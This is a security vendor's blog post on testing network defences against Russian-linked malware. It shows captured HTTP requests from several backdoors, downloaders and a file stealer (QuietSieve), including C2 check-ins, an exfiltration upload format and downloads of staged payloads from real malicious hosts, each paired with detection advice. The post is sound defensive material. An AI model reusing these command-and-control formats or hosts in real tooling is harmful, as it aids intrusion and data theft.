Testing Network Security Controls against Russian Malware

Last week, President Biden warned the United States about the potential for Russian cyberattacks in response to global economic sanctions imposed on Russia for its invasion of Ukraine. To help organizations prepare for potential cyberattacks, in our previous blogs we have focused primarily on the validation of security controls that protect endpoints. Today we discuss the practical steps you can take to validate your network security controls against known Russian tactics, techniques, and procedures to improve your security readiness.

AttackIQ has released a new assessment for our Network Control Validation (NCV) module that emulates the network traffic of various malware families used by Russian actors during their attacks against Ukraine. The scenarios in this assessment replay traffic using the packet capture (PCAP) of malware activity between an infected host and a command-and-control server. The platform then evaluates the in-line network security controls to determine if the traffic was detected or prevented.

This blog looks at the malware used in these attacks and provides recommendations for improving your mitigation and detection capabilities in response. Below is a visual image of the Network Control Validation topology. Below that is a summary of some of the key tests described in this blog.

Figure 1: Network Control Validation module topology.

Figure 2: Tests emulating Russia-based or Russia-sponsored threat actors.

Gamaredon (a.k.a, Primitive Bear and ACTINIUM) is believed to be a Russian-sponsored threat actor based out of Crimea and publicly attributed to the Russian Federal Security Service (FSB) by the Security Service of Ukraine (SBU). Microsoft and Palo Alto Networks recently published reports highlighting current and historical details about their cyberattacks against Ukraine.

Remote Template Delivery

One of the most common ways this threat actor conducts atttacks and delivers malware payloads is through the use of Microsoft Office documents that load remote templates. These initial documents are delivered through spear phishing messages, and on their own they do not contain any malicious content. Once opened, they leverage a feature in Microsoft Office that allows them to load a template for a remote server, typically over HTTP, that contains malicious macros. Actors prefer this technique because it makes it significantly easier to get the initial delivery mechanism through email gateways that would stop and remove documents containing Visual Basic Application (VBA) macros.

The network request for the remote template can easily be identified by the Microsoft Office User-Agent field in the HTTP headers.

GET /WIN-86K6F87B2S3/bid/sour/glitter.kdp HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: classroom14.nay.sour.reapart.ru Connection: Keep-Alive

Not all requests for remote templates will be malicious as it is legitimate functionality. However, the URI values can be strong indicators that all is not as it seems. In the example above, the remote template is loaded from a URI ending in glitter.kdp. ‘KDP’ is not the common file extension matching Microsoft Office templates. Most legitimate uses of the remote template functionality should end in the standard DOT, DOTM, or DOTX extensions.

The variation in the URI of the template being requested and analysis of the hosting domain can help identify when this functionality is being abused. Additionally, the template file will need to be sent in its original form and traffic inspection solutions that either scan or dynamically analyze files in transit have an opportunity to identify the malicious content.

Self-Extracting Executable Downloader

The macros in the remote template led to a VBScript file that makes a network request to download and execute a self-extracting (SFX) executable. The network request for the download adds system profiling data to the User-Agent field which makes it stand out.

GET /increase.php HTTP/1.1 Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0::[Computer Name] _[Serial Number]::/.inquire/. Accept-Language: en-us UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: sufflari.online Connection: Keep-Alive

In the example above the Computer Name and the Serial Number is added to the User-Agent field. While most actors will attempt to use common User-Agents to blend in, some actors use the field to transmit initial check-in data. Searching your proxy logs for the least common User-Agent strings can help uncover malware network activity.

Additionally, scrutinizing the User-Agent strings and understanding the metadata that makes up each value can find mismatches between what is expected for the host making the traffic and what appears in the network logs. In this instance, the User-Agent reports “Windows NT 6.1” which represents a Windows 7 host. However, the infection was recorded on a Windows 10 host which should be listed as “Windows NT 10.0” instead and then the “Gecko/20130406” value is also outdated.

Another opportunity for hunting would be looking at machines with multiple browser-like User-Agents. Consistent web activity to a small number of domains (likely command and control servers) that have a different User-Agent than most of the web browsing activity should be flagged.

The SFX file being downloaded is also sent un-obfuscated and could be analyzed by file inspection technology.

Pteranodon Backdoor

The threat actors leverage a custom malware family called Pterandodon that uses HTTP POST requests for command and control. The initial check-ins include the computer name and serial number supplied as a form-urlencoded values.

POST /index.eef/deep-water535 HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: deerflys.gortomalo.ru Content-Length: 49 Connection: Keep-Alive Cache-Control: no-cache username=[Computer Name]_[Serial] &cart=FV&deep-sea=535

This example’s HTTP POST patterns can easily be detected using Emerging Threats Suricata rules and it’s always recommended that an Intrusion Detection / Prevention System be a main component of any network defense in depth strategy. But those rules are built to match off the variables the actors use in the request. That is something that can easily change and now the traffic can become undetected.

One alternative approach is to hunt for repetitive patterns in proxy logs to find malware that beacons on a timer. The sample above beacons every 11-12 seconds until it receives commands. Any system that is making continuous HTTP POST requests to an unknown domain is a red flag. Adding criteria to your searches that can filter on repeated requests with HTTP error codes in response can help narrow down malicious activity from legitimate software updates.

QuietSieve File Stealer

One last malware family used by this actor has been called QuietSieve by Microsoft and its primary purpose is to in an automated fashion search for files match a list of extensions and then exfiltrate them using HTTP POST requests. Each file is sent as form-data with the “p” field containing base64 encoded metadata and the “file” field containing the raw contents of the file being exfiltrated.

POST /3PyVfNOf92pi8wn HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8DA0B505B588239 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:89.0.2) Gecko/20210606 Firefox/89.0.2 Host: [c2 server] Cache-Control: no-store,no-cache Pragma: no-cache Content-Length: 700 Connection: close -----------------------------8DA0B505B588239 Content-Disposition: form-data; name="p" [Base64 Encoded Metadata] -----------------------------8DA0B505B588239 Content-Disposition: form-data; name="file"; filename="[File Path]"; Content-Type: application/octet-stream Content-Transfer-Encoding: binary [File Content] -----------------------------8DA0B505B588239—

Like the backdoor beacons these requests happen as quickly as each file can be uploaded to the actor’s infrastructure. The same principles would apply in looking for repeated POST requests to the same domain over and over for extended periods of time.

NetFlow data looking at total bytes transferred to external addresses is also a good way to benchmark systems. Searching for anomalies where one hosts daily transfer far exceeds is typically output can help identify those systems uploading bulk data.

This is also a perfect opportunity for data loss prevention (DLP) solutions searching for the content of outgoing internet requests. The actors make no effort to encode or encrypt the files in transit making it easy for DLP solutions to identify important data.

TA445 / UNC1151 / Ghostwriter is believed to be operated by Belarus-based threat actors and has been observed attacking Ukraine, Poland, Belarus, and Russia with targets aligned to Russian national interests. In February, the Computer Emergency Response Team for Ukraine (CERT-UA) posted that they are continuing to be interested in tracking the activities associated with this threat actor. FireEye has previously released detailed reports highlighting their activity and tradecraft.

Multi-Stage Downloaders

This group has historically used multiple stages of downloaders before the victim receives the final payload. In these instances, they are making HTTP requests and the payloads are being returned as raw content. The scripts use the downloaded data as raw input to either load reflectively back into itself or save as a new file.

GET /update/upgrade HTTP/1.1 Host: 88.99.132.118:1985 Connection: Keep-Alive HTTP/1.1 200 OK Server: Apache-Coyote/1.1 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: 0 X-Frame-Options: DENY Content-Type: text/plain;charset=utf-8 Content-Length: 280 Date: Fri, 19 Jan 2018 09:27:19 GMT [Raw VBScript Content]

The first thing that stands out is the actor’s use of non-standard ports for HTTP traffic. In multiple samples the actors use port 1985 instead of the traditional port 80. A very common approach should be to prevent connectivity externally on non-standard ports and route all standard traffic through monitoring systems.

The scripts being downloaded are also not obfuscated and should be able to be picked up by anti-virus and file inspection solutions.

RADIOSTAR Backdoor

The RADIOSTAR backdoor communicates over HTTP POST requests and uses different encodings like Base64 and XOR to make detection difficult.

POST /update/microsoft_corpsh HTTP/1.1 User-Agent: lahsdgs23523lsknvlsdegoet Host: 88.99.132.118:1985 Content-Length: 50 Expect: 100-continue Connection: Keep-Alive HTTP/1.1 100 Continue ..pAtArApAvAyAqApAsAsALAKApAyAwAuAqAxAxAxAyAqALAKA HTTP/1.1 200 OK Server: Apache-Coyote/1.1 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: 0 X-Frame-Options: DENY Content-Type: text/plain;charset=ISO-8859-1 Content-Length: 1828 Date: Fri, 19 Jan 2018 09:27:25 GMT

Once again, the User-Agent field stands out. They use an encoded value to uniquely identify the victim and it doesn’t come close to matching any standard or common User-Agent. The same approach before of looking for the least frequently used User-Agents in your network logs will help identify anomalous behavior.

HALFSHELL Backdoor

Another backdoor used by Ghostwriter called HALFSHELL also uses HTTP POST requests but doesn’t use the User-Agent field to track the victim.

POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/6.0; .NET4.0E; .NET4.0C; Microsoft Outlook 15.0.5023; ms-office; MSOffice 15) X-Reg: [Username];[Computer Name];000C292A86AA;57c4015e14d9b3bb02b433d3e Host: cloud-security.ggpht.ml Connection: Keep-Alive

This time the actors use a Microsoft Office User-Agent to attempt to blend in and instead use a new HTTP Header Field name “X-Reg” to contain system profiling data. If HTTP Header fields are logged, the same type of frequency analysis of how often specific header fields appear can help identify anomalous behavior.

The use of the Microsoft Office User-Agent may seem like a smart way to blend in, but in general Microsoft Office is not consistently making GET and POST requests to various non-Microsoft domains. These requests should stand out.

VIDEOKILLER Backdoor

The last malware family, VIDEOKILLER, also uses HTTP for command and control but the actor has taken the initiative to encrypt the traffic with SSL. Ghostwriter has created a free SSL certificate using the Let’s Encrypt service to protect communications between the victim and their infrastructure.

Transport Layer Security TLSv1 Record Layer: Handshake Protocol: Certificate Content Type: Handshake (22) Version: TLS 1.0 (0x0301) Length: 2582 Handshake Protocol: Certificate Handshake Type: Certificate (11) Length: 2578 Certificates Length: 2575 Certificates (2575 bytes) Certificate Length: 1395 Certificate: 3082056f30820457a003020102021203e69391c8e4408de915093334848d0f9976300d06… (id-at-commonName=ggpht.ml) Certificate Length: 1174 Certificate: 308204923082037aa00302010202100a0141420000015385736a0b85eca708300d06092a… (id-at-commonName=Let's Encrypt Authority X3,id-at-organizationName=Let's Encrypt,id-at-countryName=US)<span data-ccp-props="{"469777462":[916,1832,2748,3664,4580,5496,6412,7328,8244,9160,10076,10992,11908,12824,13740,14656],"469777927":[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],"469777928":[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]}">

Let’s Encrypt is frequently abused by malicious actors as they have quick, free, and automated methods of creating SSL certificates that are generally trusted by web browsers. While there are legitimate reasons to use Let’s Encrypt, it should be one of the red flags that can be assessed when reviewing the reputation of a web request especially when reviewing from the perspective of corporate network traffic.

A layered reputation assessment that accounts for recency of domain registration, hosting changes, SSL certificates, and frequency of appearance in your network can help identify suspicious domains. Combine the results with a behavioral assessment that looks at cadence of network requests, traffic content, and related host activity to identify malicious activity.

SSL inspection for uncategorized domains is also a great option as many malware authors don’t bother adding additional encryption inside the SSL encrypted traffic which would allow IPS / IDS devices to successfully alert on malicious content.

Asylum Ambuscade is a likely Russian-sponsored campaign that Proofpoint recently identified using a possibly compromised Ukrainian armed service member’s email to target European government personnel. The vendor believes that there may be overlap with the Ghostwriter campaign but does not yet have definitive evidence.

VBA Macros and MSI Installer

The initial entry vector was a spear phishing Office attachment which uses VBA macros to create a Microsoft Installer object that attempts to install a product from a remote address.

GET / HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Windows Installer Host: 84.32.188.141 

Just like the example with remote templates, the “Windows Installer” User-Agent is not commonly going to be found in most enterprise environments downloading remote MSI files from unknown IP addresses or domains. Hunting for these requests in your proxies can help you find suspicious delivery files.

The MSI files will be transmitted in their original raw format as this is what the legitimate Windows Installer would expect. This too makes it easy for file inspection productions to pick up the malicious content.

Sunseed Backdoor

The MSI installer ultimately delivers a malware family dubbed Sunseed. It is written in Lua and uses the native libraries for making its HTTP network requests.

GET /1163631598 HTTP/1.1 host: 84.32.188.96 te: trailers connection: close, TE user-agent: LuaSocket 2.0.2 

Since the native libraries are used the default LuaSocket User-Agent is included in the network requests. Depending on your organization, this User-Agent may again fall into the infrequently used category and could be picked up in in those frequency analysis searches.

Conclusion

In conclusion, most of the malware being used in these attacks is not overly complex and most IDS or IPS products should be able to flag the majority that activity. However, it would not take significant effort on the parts of these threat actors to exhibit better operational security measures and make atomic detection of the malware traffic more difficult.

A defense-in-depth approach to security should not just be limited to single solutions at each layer of an attack. Just like on endpoints where security policies, antivirus, and HIPS / EDR solutions work together to protect an asset, a similar approach should be applied at the network. Combining atomic controls like Firewalls and IPS should be combined with frequency and behavioral analysis of the logs to stir up anomalous activity that would be difficult to identify otherwise.

It is crucial that all facets of your security program are continuously validated. Actors make continuous improvements to the operations and defenders must do the same.

Adversary Emulation

Testing Network Security Controls against Russian Malware

Published March 29, 2022

Conclusion

About the Author

Ken Towne